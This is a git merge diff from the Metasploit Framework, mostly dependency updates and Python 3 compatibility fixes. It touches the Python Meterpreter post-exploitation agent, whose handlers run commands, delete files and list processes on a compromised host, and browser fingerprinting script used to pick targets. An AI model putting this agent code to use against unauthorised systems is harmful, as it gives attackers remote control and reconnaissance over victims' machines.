Merge branch 'master' of git://github.com/rapid7/metasploit-framework into dlink_upnp_msearch_command_injection
This commit is contained in:
commit
51001f9cb3
|
@ -1,4 +1,6 @@
|
|||
.bundle
|
||||
Gemfile.local
|
||||
Gemfile.local.lock
|
||||
# Rubymine project directory
|
||||
.idea
|
||||
# Sublime Text project directory (not created by ST by default)
|
||||
|
|
1
.mailmap
1
.mailmap
|
@ -18,6 +18,7 @@ todb-r7 <todb-r7@github> Tod Beardsley <tod_beardsley@rapid7.com>
|
|||
todb-r7 <todb-r7@github> Tod Beardsley <todb@metasploit.com>
|
||||
todb-r7 <todb-r7@github> Tod Beardsley <todb@packetfu.com>
|
||||
trosen-r7 <trosen-r7@github> Trevor Rosen <Trevor_Rosen@rapid7.com>
|
||||
trosen-r7 <trosen-r7@github> Trevor Rosen <trevor@catapult-creative.com>
|
||||
wchen-r7 <wchen-r7@github> sinn3r <msfsinn3r@gmail.com> # aka sinn3r
|
||||
wchen-r7 <wchen-r7@github> sinn3r <wei_chen@rapid7.com>
|
||||
wchen-r7 <wchen-r7@github> Wei Chen <Wei_Chen@rapid7.com>
|
||||
|
|
|
@ -1 +1 @@
|
|||
1.9.3-p484
|
||||
1.9.3-p547
|
||||
|
|
|
@ -50,7 +50,7 @@ Pull requests [#2940](https://github.com/rapid7/metasploit-framework/pull/2940)
|
|||
#### New Modules
|
||||
|
||||
* **Do** run `tools/msftidy.rb` against your module and fix any errors or warnings that come up. Even better would be to set up `msftidy.rb` as a [pre-commit hook](https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb).
|
||||
* **Do** use the [many module mixin APIs](https://dev.metasploit.com/documents/api/). Wheel improvements are welcome; wheel reinventions, not so much.
|
||||
* **Do** use the [many module mixin APIs](https://dev.metasploit.com/api/). Wheel improvements are welcome; wheel reinventions, not so much.
|
||||
* **Don't** include more than one module per pull request.
|
||||
|
||||
#### Library Code
|
||||
|
|
8
Gemfile
8
Gemfile
|
@ -10,18 +10,20 @@ gem 'json'
|
|||
gem 'msgpack'
|
||||
# Needed by anemone crawler
|
||||
gem 'nokogiri'
|
||||
# Needed by db.rb and Msf::Exploit::Capture
|
||||
gem 'packetfu', '1.1.9'
|
||||
# Needed by JSObfu
|
||||
gem 'rkelly-remix', '0.0.6'
|
||||
# Needed by anemone crawler
|
||||
gem 'robots'
|
||||
# Needed by db.rb and Msf::Exploit::Capture
|
||||
gem 'packetfu', '1.1.9'
|
||||
# Needed for some post modules
|
||||
gem 'sqlite3'
|
||||
|
||||
group :db do
|
||||
# Needed for Msf::DbManager
|
||||
gem 'activerecord', '>= 3.0.0', '< 4.0.0'
|
||||
# Database models shared between framework and Pro.
|
||||
gem 'metasploit_data_models', '~> 0.17.0'
|
||||
gem 'metasploit_data_models', '0.17.0'
|
||||
# Needed for module caching in Mdm::ModuleDetails
|
||||
gem 'pg', '>= 0.11'
|
||||
end
|
||||
|
|
|
@ -0,0 +1,36 @@
|
|||
##
|
||||
# Example Gemfile.local file for Metasploit Framework
|
||||
#
|
||||
# The Gemfile.local file provides a way to use other gems that are not
|
||||
# included in the standard Gemfile provided with Metasploit.
|
||||
# This filename is included in Metasploit's .gitignore file, so local changes
|
||||
# to this file will not accidentally show up in future pull requests. This
|
||||
# example Gemfile.local includes all gems in Gemfile using instance_eval.
|
||||
# It also creates a new bundle group, 'local', to hold additional gems.
|
||||
#
|
||||
# This file will not be used by default within the framework. As such, one
|
||||
# must first install the custom Gemfile.local with bundle:
|
||||
# bundle install --gemfile Gemfile.local
|
||||
#
|
||||
# Note that msfupdate does not consider Gemfile.local when updating the
|
||||
# framework. If it is used, it may be necessary to run the above bundle
|
||||
# command after the update.
|
||||
#
|
||||
###
|
||||
|
||||
# Include the Gemfile included with the framework. This is very
|
||||
# important for picking up new gem dependencies.
|
||||
msf_gemfile = File.join(File.dirname(__FILE__), 'Gemfile')
|
||||
if File.readable?(msf_gemfile)
|
||||
instance_eval(File.read(msf_gemfile))
|
||||
end
|
||||
|
||||
# Create a custom group
|
||||
group :local do
|
||||
# Use pry to help view and interact with objects in the framework
|
||||
gem 'pry', '~> 0.9'
|
||||
# Use pry-debugger to step through code during development
|
||||
gem 'pry-debugger', '~> 0.2'
|
||||
# Add the lab gem so that the 'lab' plugin will work again
|
||||
gem 'lab', '~> 0.2.7'
|
||||
end
|
|
@ -53,6 +53,7 @@ GEM
|
|||
multi_json (~> 1.0.3)
|
||||
simplecov-html (~> 0.5.3)
|
||||
simplecov-html (0.5.3)
|
||||
sqlite3 (1.3.9)
|
||||
timecop (0.6.3)
|
||||
tzinfo (0.3.37)
|
||||
yard (0.8.7)
|
||||
|
@ -68,7 +69,7 @@ DEPENDENCIES
|
|||
factory_girl (>= 4.1.0)
|
||||
fivemat (= 1.2.1)
|
||||
json
|
||||
metasploit_data_models (~> 0.17.0)
|
||||
metasploit_data_models (= 0.17.0)
|
||||
msgpack
|
||||
network_interface (~> 0.0.1)
|
||||
nokogiri
|
||||
|
@ -82,5 +83,6 @@ DEPENDENCIES
|
|||
rspec (>= 2.12)
|
||||
shoulda-matchers
|
||||
simplecov (= 0.5.4)
|
||||
sqlite3
|
||||
timecop
|
||||
yard
|
||||
|
|
4
LICENSE
4
LICENSE
|
@ -36,6 +36,10 @@ Files: external/ruby-lorcon/*
|
|||
Copyright: 2005, dragorn and Joshua Wright
|
||||
License: LGPL-2.1
|
||||
|
||||
Files: external/source/exploits/IE11SandboxEscapes/*
|
||||
Copyright: James Forshaw, 2014
|
||||
License: GPLv3
|
||||
|
||||
Files: external/source/byakugan/*
|
||||
Copyright: Lurene Grenier, 2009
|
||||
License: BSD-3-clause
|
||||
|
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Before Width: | Height: | Size: 3.0 KiB |
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -20,6 +20,7 @@ arch_armle = "armle";
|
|||
arch_x86 = "x86";
|
||||
arch_x86_64 = "x86_64";
|
||||
arch_ppc = "ppc";
|
||||
arch_mipsle = "mipsle";
|
||||
|
||||
window.os_detect = {};
|
||||
|
||||
|
@ -184,9 +185,15 @@ window.os_detect.getVersion = function(){
|
|||
} else if (platform.match(/arm/)) {
|
||||
// Android and maemo
|
||||
arch = arch_armle;
|
||||
if (navigator.userAgent.match(/android/i)) {
|
||||
os_flavor = 'Android';
|
||||
}
|
||||
} else if (platform.match(/x86/)) {
|
||||
arch = arch_x86;
|
||||
} else if (platform.match(/mips/)) {
|
||||
arch = arch_mipsle;
|
||||
}
|
||||
|
||||
|
||||
if (navigator.userAgent.match(/android/i)) {
|
||||
os_flavor = 'Android';
|
||||
}
|
||||
} else if (platform.match(/windows/)) {
|
||||
os_name = oses_windows;
|
||||
|
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -6,10 +6,10 @@
|
|||
##
|
||||
# General
|
||||
##
|
||||
define("TLV_TYPE_HANDLE", TLV_META_TYPE_UINT | 600);
|
||||
define("TLV_TYPE_HANDLE", TLV_META_TYPE_QWORD | 600);
|
||||
define("TLV_TYPE_INHERIT", TLV_META_TYPE_BOOL | 601);
|
||||
define("TLV_TYPE_PROCESS_HANDLE", TLV_META_TYPE_UINT | 630);
|
||||
define("TLV_TYPE_THREAD_HANDLE", TLV_META_TYPE_UINT | 631);
|
||||
define("TLV_TYPE_PROCESS_HANDLE", TLV_META_TYPE_QWORD | 630);
|
||||
define("TLV_TYPE_THREAD_HANDLE", TLV_META_TYPE_QWORD | 631);
|
||||
|
||||
##
|
||||
# Fs
|
||||
|
@ -65,7 +65,7 @@ define("PROCESS_EXECUTE_FLAG_SUSPENDED", (1 << 2));
|
|||
define("PROCESS_EXECUTE_FLAG_USE_THREAD_TOKEN", (1 << 3));
|
||||
|
||||
# Registry
|
||||
define("TLV_TYPE_HKEY", TLV_META_TYPE_UINT | 1000);
|
||||
define("TLV_TYPE_HKEY", TLV_META_TYPE_QWORD | 1000);
|
||||
define("TLV_TYPE_ROOT_KEY", TLV_TYPE_HKEY);
|
||||
define("TLV_TYPE_BASE_KEY", TLV_META_TYPE_STRING | 1001);
|
||||
define("TLV_TYPE_PERMISSION", TLV_META_TYPE_UINT | 1002);
|
||||
|
@ -90,12 +90,12 @@ define("TLV_TYPE_ENV_GROUP", TLV_META_TYPE_GROUP | 1102);
|
|||
define("DELETE_KEY_FLAG_RECURSIVE", (1 << 0));
|
||||
|
||||
# Process
|
||||
define("TLV_TYPE_BASE_ADDRESS", TLV_META_TYPE_UINT | 2000);
|
||||
define("TLV_TYPE_BASE_ADDRESS", TLV_META_TYPE_QWORD | 2000);
|
||||
define("TLV_TYPE_ALLOCATION_TYPE", TLV_META_TYPE_UINT | 2001);
|
||||
define("TLV_TYPE_PROTECTION", TLV_META_TYPE_UINT | 2002);
|
||||
define("TLV_TYPE_PROCESS_PERMS", TLV_META_TYPE_UINT | 2003);
|
||||
define("TLV_TYPE_PROCESS_MEMORY", TLV_META_TYPE_RAW | 2004);
|
||||
define("TLV_TYPE_ALLOC_BASE_ADDRESS", TLV_META_TYPE_UINT | 2005);
|
||||
define("TLV_TYPE_ALLOC_BASE_ADDRESS", TLV_META_TYPE_QWORD | 2005);
|
||||
define("TLV_TYPE_MEMORY_STATE", TLV_META_TYPE_UINT | 2006);
|
||||
define("TLV_TYPE_MEMORY_TYPE", TLV_META_TYPE_UINT | 2007);
|
||||
define("TLV_TYPE_ALLOC_PROTECTION", TLV_META_TYPE_UINT | 2008);
|
||||
|
@ -109,16 +109,16 @@ define("TLV_TYPE_PROCESS_ARGUMENTS", TLV_META_TYPE_STRING | 2305);
|
|||
define("TLV_TYPE_IMAGE_FILE", TLV_META_TYPE_STRING | 2400);
|
||||
define("TLV_TYPE_IMAGE_FILE_PATH", TLV_META_TYPE_STRING | 2401);
|
||||
define("TLV_TYPE_PROCEDURE_NAME", TLV_META_TYPE_STRING | 2402);
|
||||
define("TLV_TYPE_PROCEDURE_ADDRESS", TLV_META_TYPE_UINT | 2403);
|
||||
define("TLV_TYPE_IMAGE_BASE", TLV_META_TYPE_UINT | 2404);
|
||||
define("TLV_TYPE_PROCEDURE_ADDRESS", TLV_META_TYPE_QWORD | 2403);
|
||||
define("TLV_TYPE_IMAGE_BASE", TLV_META_TYPE_QWORD | 2404);
|
||||
define("TLV_TYPE_IMAGE_GROUP", TLV_META_TYPE_GROUP | 2405);
|
||||
define("TLV_TYPE_IMAGE_NAME", TLV_META_TYPE_STRING | 2406);
|
||||
|
||||
define("TLV_TYPE_THREAD_ID", TLV_META_TYPE_UINT | 2500);
|
||||
define("TLV_TYPE_THREAD_PERMS", TLV_META_TYPE_UINT | 2502);
|
||||
define("TLV_TYPE_EXIT_CODE", TLV_META_TYPE_UINT | 2510);
|
||||
define("TLV_TYPE_ENTRY_POINT", TLV_META_TYPE_UINT | 2511);
|
||||
define("TLV_TYPE_ENTRY_PARAMETER", TLV_META_TYPE_UINT | 2512);
|
||||
define("TLV_TYPE_ENTRY_POINT", TLV_META_TYPE_QWORD | 2511);
|
||||
define("TLV_TYPE_ENTRY_PARAMETER", TLV_META_TYPE_QWORD | 2512);
|
||||
define("TLV_TYPE_CREATION_FLAGS", TLV_META_TYPE_UINT | 2513);
|
||||
|
||||
define("TLV_TYPE_REGISTER_NAME", TLV_META_TYPE_STRING | 2540);
|
||||
|
@ -137,7 +137,7 @@ define("TLV_TYPE_DESKTOP", TLV_META_TYPE_STRING | 3002);
|
|||
# Event Log
|
||||
##
|
||||
define("TLV_TYPE_EVENT_SOURCENAME", TLV_META_TYPE_STRING | 4000);
|
||||
define("TLV_TYPE_EVENT_HANDLE", TLV_META_TYPE_UINT | 4001);
|
||||
define("TLV_TYPE_EVENT_HANDLE", TLV_META_TYPE_QWORD | 4001);
|
||||
define("TLV_TYPE_EVENT_NUMRECORDS", TLV_META_TYPE_UINT | 4002);
|
||||
|
||||
define("TLV_TYPE_EVENT_READFLAGS", TLV_META_TYPE_UINT | 4003);
|
||||
|
|
|
@ -48,6 +48,24 @@ try:
|
|||
except ImportError:
|
||||
has_winreg = False
|
||||
|
||||
try:
|
||||
import winreg
|
||||
has_winreg = True
|
||||
except ImportError:
|
||||
has_winreg = (has_winreg or False)
|
||||
|
||||
if sys.version_info[0] < 3:
|
||||
is_str = lambda obj: issubclass(obj.__class__, str)
|
||||
is_bytes = lambda obj: issubclass(obj.__class__, str)
|
||||
bytes = lambda *args: str(*args[:1])
|
||||
NULL_BYTE = '\x00'
|
||||
else:
|
||||
is_str = lambda obj: issubclass(obj.__class__, __builtins__['str'])
|
||||
is_bytes = lambda obj: issubclass(obj.__class__, bytes)
|
||||
str = lambda x: __builtins__['str'](x, 'UTF-8')
|
||||
NULL_BYTE = bytes('\x00', 'UTF-8')
|
||||
long = int
|
||||
|
||||
if has_ctypes:
|
||||
#
|
||||
# Windows Structures
|
||||
|
@ -234,6 +252,7 @@ TLV_META_TYPE_STRING = (1 << 16)
|
|||
TLV_META_TYPE_UINT = (1 << 17)
|
||||
TLV_META_TYPE_RAW = (1 << 18)
|
||||
TLV_META_TYPE_BOOL = (1 << 19)
|
||||
TLV_META_TYPE_QWORD = (1 << 20)
|
||||
TLV_META_TYPE_COMPRESSED = (1 << 29)
|
||||
TLV_META_TYPE_GROUP = (1 << 30)
|
||||
TLV_META_TYPE_COMPLEX = (1 << 31)
|
||||
|
@ -266,10 +285,10 @@ TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54
|
|||
##
|
||||
# General
|
||||
##
|
||||
TLV_TYPE_HANDLE = TLV_META_TYPE_UINT | 600
|
||||
TLV_TYPE_HANDLE = TLV_META_TYPE_QWORD | 600
|
||||
TLV_TYPE_INHERIT = TLV_META_TYPE_BOOL | 601
|
||||
TLV_TYPE_PROCESS_HANDLE = TLV_META_TYPE_UINT | 630
|
||||
TLV_TYPE_THREAD_HANDLE = TLV_META_TYPE_UINT | 631
|
||||
TLV_TYPE_PROCESS_HANDLE = TLV_META_TYPE_QWORD | 630
|
||||
TLV_TYPE_THREAD_HANDLE = TLV_META_TYPE_QWORD | 631
|
||||
|
||||
##
|
||||
# Fs
|
||||
|
@ -328,7 +347,7 @@ TLV_TYPE_SHUTDOWN_HOW = TLV_META_TYPE_UINT | 1530
|
|||
##
|
||||
# Registry
|
||||
##
|
||||
TLV_TYPE_HKEY = TLV_META_TYPE_UINT | 1000
|
||||
TLV_TYPE_HKEY = TLV_META_TYPE_QWORD | 1000
|
||||
TLV_TYPE_ROOT_KEY = TLV_TYPE_HKEY
|
||||
TLV_TYPE_BASE_KEY = TLV_META_TYPE_STRING | 1001
|
||||
TLV_TYPE_PERMISSION = TLV_META_TYPE_UINT | 1002
|
||||
|
@ -358,12 +377,12 @@ DELETE_KEY_FLAG_RECURSIVE = (1 << 0)
|
|||
##
|
||||
# Process
|
||||
##
|
||||
TLV_TYPE_BASE_ADDRESS = TLV_META_TYPE_UINT | 2000
|
||||
TLV_TYPE_BASE_ADDRESS = TLV_META_TYPE_QWORD | 2000
|
||||
TLV_TYPE_ALLOCATION_TYPE = TLV_META_TYPE_UINT | 2001
|
||||
TLV_TYPE_PROTECTION = TLV_META_TYPE_UINT | 2002
|
||||
TLV_TYPE_PROCESS_PERMS = TLV_META_TYPE_UINT | 2003
|
||||
TLV_TYPE_PROCESS_MEMORY = TLV_META_TYPE_RAW | 2004
|
||||
TLV_TYPE_ALLOC_BASE_ADDRESS = TLV_META_TYPE_UINT | 2005
|
||||
TLV_TYPE_ALLOC_BASE_ADDRESS = TLV_META_TYPE_QWORD | 2005
|
||||
TLV_TYPE_MEMORY_STATE = TLV_META_TYPE_UINT | 2006
|
||||
TLV_TYPE_MEMORY_TYPE = TLV_META_TYPE_UINT | 2007
|
||||
TLV_TYPE_ALLOC_PROTECTION = TLV_META_TYPE_UINT | 2008
|
||||
|
@ -379,16 +398,16 @@ TLV_TYPE_PARENT_PID = TLV_META_TYPE_UINT | 2307
|
|||
TLV_TYPE_IMAGE_FILE = TLV_META_TYPE_STRING | 2400
|
||||
TLV_TYPE_IMAGE_FILE_PATH = TLV_META_TYPE_STRING | 2401
|
||||
TLV_TYPE_PROCEDURE_NAME = TLV_META_TYPE_STRING | 2402
|
||||
TLV_TYPE_PROCEDURE_ADDRESS = TLV_META_TYPE_UINT | 2403
|
||||
TLV_TYPE_IMAGE_BASE = TLV_META_TYPE_UINT | 2404
|
||||
TLV_TYPE_PROCEDURE_ADDRESS = TLV_META_TYPE_QWORD | 2403
|
||||
TLV_TYPE_IMAGE_BASE = TLV_META_TYPE_QWORD | 2404
|
||||
TLV_TYPE_IMAGE_GROUP = TLV_META_TYPE_GROUP | 2405
|
||||
TLV_TYPE_IMAGE_NAME = TLV_META_TYPE_STRING | 2406
|
||||
|
||||
TLV_TYPE_THREAD_ID = TLV_META_TYPE_UINT | 2500
|
||||
TLV_TYPE_THREAD_PERMS = TLV_META_TYPE_UINT | 2502
|
||||
TLV_TYPE_EXIT_CODE = TLV_META_TYPE_UINT | 2510
|
||||
TLV_TYPE_ENTRY_POINT = TLV_META_TYPE_UINT | 2511
|
||||
TLV_TYPE_ENTRY_PARAMETER = TLV_META_TYPE_UINT | 2512
|
||||
TLV_TYPE_ENTRY_POINT = TLV_META_TYPE_QWORD | 2511
|
||||
TLV_TYPE_ENTRY_PARAMETER = TLV_META_TYPE_QWORD | 2512
|
||||
TLV_TYPE_CREATION_FLAGS = TLV_META_TYPE_UINT | 2513
|
||||
|
||||
TLV_TYPE_REGISTER_NAME = TLV_META_TYPE_STRING | 2540
|
||||
|
@ -407,7 +426,7 @@ TLV_TYPE_DESKTOP = TLV_META_TYPE_STRING | 3002
|
|||
# Event Log
|
||||
##
|
||||
TLV_TYPE_EVENT_SOURCENAME = TLV_META_TYPE_STRING | 4000
|
||||
TLV_TYPE_EVENT_HANDLE = TLV_META_TYPE_UINT | 4001
|
||||
TLV_TYPE_EVENT_HANDLE = TLV_META_TYPE_QWORD | 4001
|
||||
TLV_TYPE_EVENT_NUMRECORDS = TLV_META_TYPE_UINT | 4002
|
||||
|
||||
TLV_TYPE_EVENT_READFLAGS = TLV_META_TYPE_UINT | 4003
|
||||
|
@ -498,11 +517,12 @@ def get_stat_buffer(path):
|
|||
blocks = si.st_blocks
|
||||
st_buf = struct.pack('<IHHH', si.st_dev, min(0xffff, si.st_ino), si.st_mode, si.st_nlink)
|
||||
st_buf += struct.pack('<HHHI', si.st_uid, si.st_gid, 0, rdev)
|
||||
st_buf += struct.pack('<IIII', si.st_size, si.st_atime, si.st_mtime, si.st_ctime)
|
||||
st_buf += struct.pack('<IIII', si.st_size, long(si.st_atime), long(si.st_mtime), long(si.st_ctime))
|
||||
st_buf += struct.pack('<II', blksize, blocks)
|
||||
return st_buf
|
||||
|
||||
def netlink_request(req_type):
|
||||
import select
|
||||
# See RFC 3549
|
||||
NLM_F_REQUEST = 0x0001
|
||||
NLM_F_ROOT = 0x0100
|
||||
|
@ -513,17 +533,25 @@ def netlink_request(req_type):
|
|||
sock.bind((os.getpid(), 0))
|
||||
seq = int(time.time())
|
||||
nlmsg = struct.pack('IHHIIB15x', 32, req_type, (NLM_F_REQUEST | NLM_F_ROOT), seq, 0, socket.AF_UNSPEC)
|
||||
sfd = os.fdopen(sock.fileno(), 'w+b')
|
||||
sfd.write(nlmsg)
|
||||
sock.send(nlmsg)
|
||||
responses = []
|
||||
response = cstruct_unpack(NLMSGHDR, sfd.read(ctypes.sizeof(NLMSGHDR)))
|
||||
if not len(select.select([sock.fileno()], [], [], 0.5)[0]):
|
||||
return responses
|
||||
raw_response_data = sock.recv(0xfffff)
|
||||
response = cstruct_unpack(NLMSGHDR, raw_response_data[:ctypes.sizeof(NLMSGHDR)])
|
||||
raw_response_data = raw_response_data[ctypes.sizeof(NLMSGHDR):]
|
||||
while response.type != NLMSG_DONE:
|
||||
if response.type == NLMSG_ERROR:
|
||||
break
|
||||
response_data = sfd.read(response.len - 16)
|
||||
response_data = raw_response_data[:(response.len - 16)]
|
||||
responses.append(response_data)
|
||||
response = cstruct_unpack(NLMSGHDR, sfd.read(ctypes.sizeof(NLMSGHDR)))
|
||||
sfd.close()
|
||||
raw_response_data = raw_response_data[len(response_data):]
|
||||
if not len(raw_response_data):
|
||||
if not len(select.select([sock.fileno()], [], [], 0.5)[0]):
|
||||
break
|
||||
raw_response_data = sock.recv(0xfffff)
|
||||
response = cstruct_unpack(NLMSGHDR, raw_response_data[:ctypes.sizeof(NLMSGHDR)])
|
||||
raw_response_data = raw_response_data[ctypes.sizeof(NLMSGHDR):]
|
||||
sock.close()
|
||||
return responses
|
||||
|
||||
|
@ -559,7 +587,7 @@ def channel_open_stdapi_fs_file(request, response):
|
|||
else:
|
||||
fmode = 'rb'
|
||||
file_h = open(fpath, fmode)
|
||||
channel_id = meterpreter.add_channel(file_h)
|
||||
channel_id = meterpreter.add_channel(MeterpreterFile(file_h))
|
||||
response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
|
||||
return ERROR_SUCCESS, response
|
||||
|
||||
|
@ -675,6 +703,7 @@ def stdapi_sys_process_execute(request, response):
|
|||
proc_h.stderr = open(os.devnull, 'rb')
|
||||
else:
|
||||
proc_h = STDProcess(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
|
||||
proc_h.echo_protection = True
|
||||
proc_h.start()
|
||||
else:
|
||||
proc_h = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
|
||||
|
@ -693,15 +722,15 @@ def stdapi_sys_process_getpid(request, response):
|
|||
|
||||
def stdapi_sys_process_get_processes_via_proc(request, response):
|
||||
for pid in os.listdir('/proc'):
|
||||
pgroup = ''
|
||||
pgroup = bytes()
|
||||
if not os.path.isdir(os.path.join('/proc', pid)) or not pid.isdigit():
|
||||
continue
|
||||
cmd = open(os.path.join('/proc', pid, 'cmdline'), 'rb').read(512).replace('\x00', ' ')
|
||||
status_data = open(os.path.join('/proc', pid, 'status'), 'rb').read()
|
||||
cmdline_file = open(os.path.join('/proc', pid, 'cmdline'), 'rb')
|
||||
cmd = str(cmdline_file.read(512).replace(NULL_BYTE, bytes(' ', 'UTF-8')))
|
||||
status_data = str(open(os.path.join('/proc', pid, 'status'), 'rb').read())
|
||||
status_data = map(lambda x: x.split('\t',1), status_data.split('\n'))
|
||||
status_data = filter(lambda x: len(x) == 2, status_data)
|
||||
status = {}
|
||||
for k, v in status_data:
|
||||
for k, v in filter(lambda x: len(x) == 2, status_data):
|
||||
status[k[:-1]] = v.strip()
|
||||
ppid = status.get('PPid')
|
||||
uid = status.get('Uid').split('\t', 1)[0]
|
||||
|
@ -725,14 +754,14 @@ def stdapi_sys_process_get_processes_via_proc(request, response):
|
|||
def stdapi_sys_process_get_processes_via_ps(request, response):
|
||||
ps_args = ['ps', 'ax', '-w', '-o', 'pid,ppid,user,command']
|
||||
proc_h = subprocess.Popen(ps_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
|
||||
ps_output = proc_h.stdout.read()
|
||||
ps_output = str(proc_h.stdout.read())
|
||||
ps_output = ps_output.split('\n')
|
||||
ps_output.pop(0)
|
||||
for process in ps_output:
|
||||
process = process.split()
|
||||
if len(process) < 4:
|
||||
break
|
||||
pgroup = ''
|
||||
pgroup = bytes()
|
||||
pgroup += tlv_pack(TLV_TYPE_PID, int(process[0]))
|
||||
pgroup += tlv_pack(TLV_TYPE_PARENT_PID, int(process[1]))
|
||||
pgroup += tlv_pack(TLV_TYPE_USER_NAME, process[2])
|
||||
|
@ -793,7 +822,7 @@ def stdapi_sys_process_get_processes_via_windll(request, response):
|
|||
use = ctypes.c_ulong()
|
||||
use.value = 0
|
||||
ctypes.windll.advapi32.LookupAccountSidA(None, user_tkn.Sid, username, ctypes.byref(u_len), domain, ctypes.byref(d_len), ctypes.byref(use))
|
||||
complete_username = ctypes.string_at(domain) + '\\' + ctypes.string_at(username)
|
||||
complete_username = str(ctypes.string_at(domain)) + '\\' + str(ctypes.string_at(username))
|
||||
k32.CloseHandle(tkn_h)
|
||||
parch = windll_GetNativeSystemInfo()
|
||||
is_wow64 = ctypes.c_ubyte()
|
||||
|
@ -802,7 +831,7 @@ def stdapi_sys_process_get_processes_via_windll(request, response):
|
|||
if k32.IsWow64Process(proc_h, ctypes.byref(is_wow64)):
|
||||
if is_wow64.value:
|
||||
parch = PROCESS_ARCH_X86
|
||||
pgroup = ''
|
||||
pgroup = bytes()
|
||||
pgroup += tlv_pack(TLV_TYPE_PID, pe32.th32ProcessID)
|
||||
pgroup += tlv_pack(TLV_TYPE_PARENT_PID, pe32.th32ParentProcessID)
|
||||
pgroup += tlv_pack(TLV_TYPE_USER_NAME, complete_username)
|
||||
|
@ -850,16 +879,18 @@ def stdapi_fs_delete_dir(request, response):
|
|||
@meterpreter.register_function
|
||||
def stdapi_fs_delete_file(request, response):
|
||||
file_path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
|
||||
os.unlink(file_path)
|
||||
if os.path.exists(file_path):
|
||||
os.unlink(file_path)
|
||||
return ERROR_SUCCESS, response
|
||||
|
||||
@meterpreter.register_function
|
||||
def stdapi_fs_file_expand_path(request, response):
|
||||
path_tlv = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
|
||||
if has_windll:
|
||||
path_tlv = ctypes.create_string_buffer(bytes(path_tlv, 'UTF-8'))
|
||||
path_out = (ctypes.c_char * 4096)()
|
||||
path_out_len = ctypes.windll.kernel32.ExpandEnvironmentStringsA(path_tlv, ctypes.byref(path_out), ctypes.sizeof(path_out))
|
||||
result = ''.join(path_out)[:path_out_len]
|
||||
path_out_len = ctypes.windll.kernel32.ExpandEnvironmentStringsA(ctypes.byref(path_tlv), ctypes.byref(path_out), ctypes.sizeof(path_out))
|
||||
result = str(ctypes.string_at(path_out))
|
||||
elif path_tlv == '%COMSPEC%':
|
||||
result = '/bin/sh'
|
||||
elif path_tlv in ['%TEMP%', '%TMP%']:
|
||||
|
@ -912,7 +943,8 @@ def stdapi_fs_md5(request, response):
|
|||
@meterpreter.register_function
|
||||
def stdapi_fs_mkdir(request, response):
|
||||
dir_path = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value']
|
||||
os.mkdir(dir_path)
|
||||
if not os.path.isdir(dir_path):
|
||||
os.mkdir(dir_path)
|
||||
return ERROR_SUCCESS, response
|
||||
|
||||
@meterpreter.register_function
|
||||
|
@ -965,7 +997,7 @@ def stdapi_fs_stat(request, response):
|
|||
|
||||
@meterpreter.register_function
|
||||
def stdapi_net_config_get_interfaces(request, response):
|
||||
if hasattr(socket, 'AF_NETLINK'):
|
||||
if hasattr(socket, 'AF_NETLINK') and hasattr(socket, 'NETLINK_ROUTE'):
|
||||
interfaces = stdapi_net_config_get_interfaces_via_netlink()
|
||||
elif has_osxsc:
|
||||
interfaces = stdapi_net_config_get_interfaces_via_osxsc()
|
||||
|
@ -974,7 +1006,7 @@ def stdapi_net_config_get_interfaces(request, response):
|
|||
else:
|
||||
return ERROR_FAILURE, response
|
||||
for iface_info in interfaces:
|
||||
iface_tlv = ''
|
||||
iface_tlv = bytes()
|
||||
iface_tlv += tlv_pack(TLV_TYPE_MAC_NAME, iface_info.get('name', 'Unknown'))
|
||||
iface_tlv += tlv_pack(TLV_TYPE_MAC_ADDRESS, iface_info.get('hw_addr', '\x00\x00\x00\x00\x00\x00'))
|
||||
if 'mtu' in iface_info:
|
||||
|
@ -1002,7 +1034,7 @@ def stdapi_net_config_get_interfaces_via_netlink():
|
|||
0x0100: 'PROMISC',
|
||||
0x1000: 'MULTICAST'
|
||||
}
|
||||
iface_flags_sorted = iface_flags.keys()
|
||||
iface_flags_sorted = list(iface_flags.keys())
|
||||
# Dictionaries don't maintain order
|
||||
iface_flags_sorted.sort()
|
||||
interfaces = {}
|
||||
|
@ -1106,7 +1138,7 @@ def stdapi_net_config_get_interfaces_via_osxsc():
|
|||
hw_addr = hw_addr.replace(':', '')
|
||||
hw_addr = hw_addr.decode('hex')
|
||||
iface_info['hw_addr'] = hw_addr
|
||||
ifnames = interfaces.keys()
|
||||
ifnames = list(interfaces.keys())
|
||||
ifnames.sort()
|
||||
for iface_name, iface_info in interfaces.items():
|
||||
iface_info['index'] = ifnames.index(iface_name)
|
||||
|
@ -1138,7 +1170,10 @@ def stdapi_net_config_get_interfaces_via_windll():
|
|||
iface_info['index'] = AdapterAddresses.u.s.IfIndex
|
||||
if AdapterAddresses.PhysicalAddressLength:
|
||||
iface_info['hw_addr'] = ctypes.string_at(ctypes.byref(AdapterAddresses.PhysicalAddress), AdapterAddresses.PhysicalAddressLength)
|
||||
iface_info['name'] = str(ctypes.wstring_at(AdapterAddresses.Description))
|
||||
iface_desc = ctypes.wstring_at(AdapterAddresses.Description)
|
||||
if not is_str(iface_desc):
|
||||
iface_desc = str(iface_desc)
|
||||
iface_info['name'] = iface_desc
|
||||
iface_info['mtu'] = AdapterAddresses.Mtu
|
||||
pUniAddr = AdapterAddresses.FirstUnicastAddress
|
||||
while pUniAddr:
|
||||
|
@ -1174,7 +1209,7 @@ def stdapi_net_config_get_interfaces_via_windll_mib():
|
|||
table_data = ctypes.string_at(table, pdwSize.value)
|
||||
entries = struct.unpack('I', table_data[:4])[0]
|
